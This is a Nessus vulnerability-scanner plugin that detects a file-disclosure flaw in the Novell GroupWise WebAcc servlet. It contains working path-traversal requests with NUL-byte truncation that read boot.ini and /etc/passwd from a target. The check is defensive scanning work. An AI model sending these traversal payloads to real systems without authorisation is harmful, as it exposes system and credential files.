File: novell_groupwise_webacc_information_disclosure.nasl

#
# Copyright 2001 by Noam Rathaus <noamr@securiteam.com>
#
# See the Nessus Scripts License for details
#
#

if(description)
{
 script_id(10789);

 # Plugin name, as shown in the plugin list and in the report header.
 script_name(english:"Novell Groupwise WebAcc Information Disclosure");

 # Full report text: the finding, the recommended action and a reference.
 script_description(english:"
Novell Groupwise WebAcc Servlet is installed. This servlet exposes 
critical system information, and allows remote attackers to read any file.

Solution: Disable access to the servlet until the author releases a patch.
Risk factor : High

Additional information:
http://www.securiteam.com/securitynews/6S00N0K2UM.html");

 # One-line summary shown while the scan runs.
 script_summary(english:"Novell Groupwise WebAcc Information Disclosure");

 # Read-only probe: the check below only fetches two well-known files,
 # it never tries to crash or modify the target.
 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2001 SecuriTeam");
 script_family(english:"CGI abuses");

 # Run after the service finder and the no-404 detector, on every web
 # service found (default port 80 when none was discovered).
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

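url = string("/servlet/webacc");
port = is_cgi_installed(url);
if (port)
{
 # Both probes hand the servlet's User.html parameter a path that climbs far
 # above the web root.  The trailing %00 is a NUL byte, presumably to cut off
 # any suffix the servlet appends before opening the file (classic NUL-byte
 # truncation; confirm against the advisory).  A Host header is sent although
 # the request is HTTP/1.0, so name-based virtual hosts route it correctly.

 # Test NT systems: boot.ini always starts with a "[boot loader]" section.
 req = string("GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 HTTP/1.0\r\n");
 req = string(req, "User-Agent: Mozilla/7 [en] (X11; U; Linux 2.6.1 ia64)\r\n");
 req = string(req, "Host: ", get_host_name(), "\r\n\r\n");

 soc = open_sock_tcp(port);
 if (soc)
 {
  send(socket:soc, data:req);
  # Read enough to get past the HTTP headers: the marker sits at the very
  # top of the file, but a verbose header block could push it past 1000 bytes.
  buf = recv(socket:soc, length:4096);
  # Close before reporting, and only a socket that was actually opened;
  # the original closed unconditionally and leaked the socket on exit().
  close(soc);
  if ("[boot loader]" >< buf)
  {
   security_hole(port:port);
   exit(0);
  }
 }

 # Test unix systems.  Match a genuine root entry (uid 0, gid 0 or 1) instead
 # of any "root:" substring, so an error page or mail body that merely
 # mentions "root:" is not reported as a disclosed /etc/passwd.
 req = string("GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0\r\n");
 req = string(req, "User-Agent: Mozilla/7 [en] (X11; U; Linux 2.6.1 ia64)\r\n");
 req = string(req, "Host: ", get_host_name(), "\r\n\r\n");

 soc = open_sock_tcp(port);
 if (soc)
 {
  send(socket:soc, data:req);
  buf = recv(socket:soc, length:4096);
  close(soc);
  if (egrep(pattern:"root:.*:0:[01]:", string:buf))
  {
   security_hole(port:port);
   exit(0);
  }
  # The servlet is reachable and parsed the path but refused it: nothing was
  # disclosed, so this is only a note that the servlet is exposed.
  if ("File does not exist" >< buf)
  {
   security_note(port:port);
  }
 }
}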